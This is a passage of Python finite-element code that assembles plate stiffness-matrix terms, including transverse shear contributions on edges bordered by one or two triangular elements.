k0[i4*dof+4, i1*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*ny1 + f21*le2*ny2 + f31*le3*ny3 + f41*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f11*le1*nx1 + f21*le2*nx2 + f31*le3*nx3 + f41*le4*nx4)/Ac)
k0[i4*dof+4, i2*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+4, i2*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+4, i2*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac)
k0[i4*dof+4, i2*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*ny1 + f22*le2*ny2 + f32*le3*ny3 + f42*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f12*le1*nx1 + f22*le2*nx2 + f32*le3*nx3 + f42*le4*nx4)/Ac)
k0[i4*dof+4, i3*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+4, i3*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+4, i3*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac)
k0[i4*dof+4, i3*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*ny1 + f23*le2*ny2 + f33*le3*ny3 + f43*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f13*le1*nx1 + f23*le2*nx2 + f33*le3*nx3 + f43*le4*nx4)/Ac)
k0[i4*dof+4, i4*dof+0] += Ac*((B12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+4, i4*dof+1] += Ac*((B22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (B26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + B66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
k0[i4*dof+4, i4*dof+3] += Ac*((D12*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D16*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac)
k0[i4*dof+4, i4*dof+4] += Ac*((D22*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D26*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + (D26*(f14*le1*ny1 + f24*le2*ny2 + f34*le3*ny3 + f44*le4*ny4)/Ac + D66*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)*(f14*le1*nx1 + f24*le2*nx2 + f34*le3*nx3 + f44*le4*nx4)/Ac)
if len(edge.trias) == 1:
tria = edge.trias[0]
if not tria.n1 in edge.nodes:
other1 = tria.n1
elif not tria.n2 in edge.nodes:
other1 = tria.n2
elif not tria.n3 in edge.nodes:
other1 = tria.n3
else:
raise RuntimeError('Invalid connectivity tria-edge')
if np.dot(np.cross((n2 - n1).pos, (other1 - n1).pos), ZGLOBAL) > 0:
tn1, tn2 = n1, n2
else:
tn1, tn2 = n2, n1
x1, y1, z1 = tn1.pos
x2, y2, z2 = tn2.pos
x3, y3, z3 = other1.pos
a = x2 - x1
b = y2 - y1
c = x3 - x1
d = y3 - y1
Ae = tria.Ae
#TODO interpolate nodal properties when used
if prop_from_node:
raise NotImplementedError('')
k = 5/6 #TODO!!!
E = k * tria.prop.E
E44 = E[0, 0]
E45 = E[0, 1]
E55 = E[1, 1]
i1 = tn1.index
i2 = tn2.index
i3 = other1.index
k0[i1*dof+2, i1*dof+2] += (-(a - c)*(E45*(b - d) - E55*(a - c)) + (b - d)*(E44*(b - d) - E45*(a - c)))/(4*(Ae*Ae))
k0[i1*dof+2, i1*dof+3] += (E44*(b - d) - E45*(a - c))/(4*Ae)
k0[i1*dof+2, i1*dof+4] += (E45*(b - d) - E55*(a - c))/(4*Ae)
k0[i1*dof+2, i2*dof+2] += (-c*(E45*(b - d) - E55*(a - c)) + d*(E44*(b - d) - E45*(a - c)))/(4*(Ae*Ae))
k0[i1*dof+2, i2*dof+3] += a*(-c*(E45*(b - d) - E55*(a - c)) + d*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+2, i2*dof+4] += b*(-c*(E45*(b - d) - E55*(a - c)) + d*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+2, i3*dof+2] += (a*(E45*(b - d) - E55*(a - c)) - b*(E44*(b - d) - E45*(a - c)))/(4*(Ae*Ae))
k0[i1*dof+2, i3*dof+3] += c*(a*(E45*(b - d) - E55*(a - c)) - b*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+2, i3*dof+4] += d*(a*(E45*(b - d) - E55*(a - c)) - b*(E44*(b - d) - E45*(a - c)))/(8*(Ae*Ae))
k0[i1*dof+3, i1*dof+2] += (E44*(b - d) - E45*(a - c))/(4*Ae)
k0[i1*dof+3, i1*dof+3] += E44/4
k0[i1*dof+3, i1*dof+4] += E45/4
k0[i1*dof+3, i2*dof+2] += (E44*d - E45*c)/(4*Ae)
k0[i1*dof+3, i2*dof+3] += a*(E44*d - E45*c)/(8*Ae)
k0[i1*dof+3, i2*dof+4] += b*(E44*d - E45*c)/(8*Ae)
k0[i1*dof+3, i3*dof+2] += (-E44*b + E45*a)/(4*Ae)
k0[i1*dof+3, i3*dof+3] += c*(-E44*b + E45*a)/(8*Ae)
k0[i1*dof+3, i3*dof+4] += d*(-E44*b + E45*a)/(8*Ae)
k0[i1*dof+4, i1*dof+2] += (E45*(b - d) - E55*(a - c))/(4*Ae)
k0[i1*dof+4, i1*dof+3] += E45/4
k0[i1*dof+4, i1*dof+4] += E55/4
k0[i1*dof+4, i2*dof+2] += (E45*d - E55*c)/(4*Ae)
k0[i1*dof+4, i2*dof+3] += a*(E45*d - E55*c)/(8*Ae)
k0[i1*dof+4, i2*dof+4] += b*(E45*d - E55*c)/(8*Ae)
k0[i1*dof+4, i3*dof+2] += (-E45*b + E55*a)/(4*Ae)
k0[i1*dof+4, i3*dof+3] += c*(-E45*b + E55*a)/(8*Ae)
k0[i1*dof+4, i3*dof+4] += d*(-E45*b + E55*a)/(8*Ae)
k0[i2*dof+2, i1*dof+2] += (-(a - c)*(E45*d - E55*c) + (b - d)*(E44*d - E45*c))/(4*(Ae*Ae))
k0[i2*dof+2, i1*dof+3] += (E44*d - E45*c)/(4*Ae)
k0[i2*dof+2, i1*dof+4] += (E45*d - E55*c)/(4*Ae)
k0[i2*dof+2, i2*dof+2] += (-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(4*(Ae*Ae))
k0[i2*dof+2, i2*dof+3] += a*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+2, i2*dof+4] += b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+2, i3*dof+2] += (a*(E45*d - E55*c) - b*(E44*d - E45*c))/(4*(Ae*Ae))
k0[i2*dof+2, i3*dof+3] += c*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+2, i3*dof+4] += d*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i1*dof+2] += a*(-(a - c)*(E45*d - E55*c) + (b - d)*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i1*dof+3] += a*(E44*d - E45*c)/(8*Ae)
k0[i2*dof+3, i1*dof+4] += a*(E45*d - E55*c)/(8*Ae)
k0[i2*dof+3, i2*dof+2] += a*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i2*dof+3] += (a*a)*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+3, i2*dof+4] += a*b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+3, i3*dof+2] += a*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+3, i3*dof+3] += a*c*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+3, i3*dof+4] += a*d*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i1*dof+2] += b*(-(a - c)*(E45*d - E55*c) + (b - d)*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+4, i1*dof+3] += b*(E44*d - E45*c)/(8*Ae)
k0[i2*dof+4, i1*dof+4] += b*(E45*d - E55*c)/(8*Ae)
k0[i2*dof+4, i2*dof+2] += b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+4, i2*dof+3] += a*b*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i2*dof+4] += (b*b)*(-c*(E45*d - E55*c) + d*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i3*dof+2] += b*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(8*(Ae*Ae))
k0[i2*dof+4, i3*dof+3] += b*c*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i2*dof+4, i3*dof+4] += b*d*(a*(E45*d - E55*c) - b*(E44*d - E45*c))/(16*(Ae*Ae))
k0[i3*dof+2, i1*dof+2] += ((a - c)*(E45*b - E55*a) - (b - d)*(E44*b - E45*a))/(4*(Ae*Ae))
k0[i3*dof+2, i1*dof+3] += (-E44*b + E45*a)/(4*Ae)
k0[i3*dof+2, i1*dof+4] += (-E45*b + E55*a)/(4*Ae)
k0[i3*dof+2, i2*dof+2] += (c*(E45*b - E55*a) - d*(E44*b - E45*a))/(4*(Ae*Ae))
k0[i3*dof+2, i2*dof+3] += a*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+2, i2*dof+4] += b*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+2, i3*dof+2] += (-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(4*(Ae*Ae))
k0[i3*dof+2, i3*dof+3] += c*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+2, i3*dof+4] += d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i1*dof+2] += c*((a - c)*(E45*b - E55*a) - (b - d)*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i1*dof+3] += c*(-E44*b + E45*a)/(8*Ae)
k0[i3*dof+3, i1*dof+4] += c*(-E45*b + E55*a)/(8*Ae)
k0[i3*dof+3, i2*dof+2] += c*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i2*dof+3] += a*c*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+3, i2*dof+4] += b*c*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+3, i3*dof+2] += c*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+3, i3*dof+3] += (c*c)*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+3, i3*dof+4] += c*d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i1*dof+2] += d*((a - c)*(E45*b - E55*a) - (b - d)*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+4, i1*dof+3] += d*(-E44*b + E45*a)/(8*Ae)
k0[i3*dof+4, i1*dof+4] += d*(-E45*b + E55*a)/(8*Ae)
k0[i3*dof+4, i2*dof+2] += d*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+4, i2*dof+3] += a*d*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i2*dof+4] += b*d*(c*(E45*b - E55*a) - d*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i3*dof+2] += d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(8*(Ae*Ae))
k0[i3*dof+4, i3*dof+3] += c*d*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
k0[i3*dof+4, i3*dof+4] += (d*d)*(-a*(E45*b - E55*a) + b*(E44*b - E45*a))/(16*(Ae*Ae))
else:
k1 = k2 = 5/6
tria1 = edge.trias[0]
tria2 = edge.trias[1]
if not tria1.n1 in edge.nodes:
other1 = tria1.n1
elif not tria1.n2 in edge.nodes:
other1 = tria1.n2
elif not tria1.n3 in edge.nodes:
other1 = tria1.n3
else:
raise RuntimeError('Invalid connectivity tria-edge')
if not tria2.n1 in edge.nodes:
other2 = tria2.n1
elif not tria2.n2 in edge.nodes:
other2 = tria2.n2
elif not tria2.n3 in edge.nodes:
other2 = tria2.n3
else:
raise RuntimeError('Invalid connectivity tria-edge')
if np.dot(np.cross((n2 - n1).pos, (other1 - n1).pos), ZGLOBAL) > 0:
t1n1, t1n2 = n1, n2
else:
t1n1, t1n2 = n2, n1
x1, y1, z1 = t1n1.pos
x2, y2, z2 = t1n2.pos
x3, y3, z3 = other1.pos
a1 = x2 - x1
b1 = y2 - y1
c1 = x3 - x1
d1 = y3 - y1
Ae1 = tria1.Ae
tmp = [n1, n2, tria1.getMid()]
Ac1 = area_of_polygon([n.pos[0] for n in tmp], [n.pos[1] for n in tmp])
if np.dot(np.cross((n2 - n1).pos, (other2 - n1).pos), ZGLOBAL) > 0:
t2n1, t2n2 = n1, n2
else:
t2n1, t2n2 = n2, n1
x1, y1, z1 = t2n1.pos
x2, y2, z2 = t2n2.pos
x3, y3, z3 = other2.pos
a2 = x2 - x1
b2 = y2 - y1
c2 = x3 - x1
d2 = y3 - y1
Ae2 = tria2.Ae
tmp = [n1, n2, tria2.getMid()]
Ac2 = area_of_polygon([n.pos[0] for n in tmp], [n.pos[1] for n in tmp])
E = k1*Ac1/Ac*tria1.prop.E + k2*Ac2/Ac*tria2.prop.E
E44 = E[0, 0]
E45 = E[0, 1]
E55 = E[1, 1]
i1 = n1.index
i2 = n2.index
i3 = other1.index
i4 = other2.index
k0[i1*dof+2, i1*dof+2] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i1*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+2, i1*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+2, i2*dof+2] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i2*dof+3] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i2*dof+4] += ((E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - (E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*(Ae1*Ae1)*(Ae2*Ae2))
k0[i1*dof+2, i3*dof+2] += Ac1*(a1*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b1*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(4*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i1*dof+2, i3*dof+3] += Ac1*c1*(a1*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b1*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i1*dof+2, i3*dof+4] += Ac1*d1*(a1*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b1*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*(Ae1*Ae1)*Ae2)
k0[i1*dof+2, i4*dof+2] += Ac2*(a2*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b2*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(4*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i1*dof+2, i4*dof+3] += Ac2*c2*(a2*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b2*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i1*dof+2, i4*dof+4] += Ac2*d2*(a2*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))) - b2*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2))))/(8*(Ac*Ac)*Ae1*(Ae2*Ae2))
k0[i1*dof+3, i1*dof+2] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E45*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i1*dof+3] += E44*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+3, i1*dof+4] += E45*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+3, i2*dof+2] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E45*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i2*dof+3] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E45*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i2*dof+4] += (Ac1 + Ac2)*(E44*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E45*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+3, i3*dof+2] += Ac1*(Ac1 + Ac2)*(-E44*b1 + E45*a1)/(4*(Ac*Ac)*Ae1)
k0[i1*dof+3, i3*dof+3] += Ac1*c1*(Ac1 + Ac2)*(-E44*b1 + E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+3, i3*dof+4] += Ac1*d1*(Ac1 + Ac2)*(-E44*b1 + E45*a1)/(8*(Ac*Ac)*Ae1)
k0[i1*dof+3, i4*dof+2] += Ac2*(Ac1 + Ac2)*(-E44*b2 + E45*a2)/(4*(Ac*Ac)*Ae2)
k0[i1*dof+3, i4*dof+3] += Ac2*c2*(Ac1 + Ac2)*(-E44*b2 + E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i1*dof+3, i4*dof+4] += Ac2*d2*(Ac1 + Ac2)*(-E44*b2 + E45*a2)/(8*(Ac*Ac)*Ae2)
k0[i1*dof+4, i1*dof+2] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*(b1 - d1) + Ac2*Ae1*(b2 - d2)) - E55*(Ac1*Ae2*(a1 - c1) + Ac2*Ae1*(a2 - c2)))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+4, i1*dof+3] += E45*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+4, i1*dof+4] += E55*(Ac1 + Ac2)**2/(4*(Ac*Ac))
k0[i1*dof+4, i2*dof+2] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*d1 + Ac2*Ae1*d2) - E55*(Ac1*Ae2*c1 + Ac2*Ae1*c2))/(4*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+4, i2*dof+3] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*a1*d1 + Ac2*Ae1*a2*d2) - E55*(Ac1*Ae2*a1*c1 + Ac2*Ae1*a2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
k0[i1*dof+4, i2*dof+4] += (Ac1 + Ac2)*(E45*(Ac1*Ae2*b1*d1 + Ac2*Ae1*b2*d2) - E55*(Ac1*Ae2*b1*c1 + Ac2*Ae1*b2*c2))/(8*(Ac*Ac)*Ae1*Ae2)
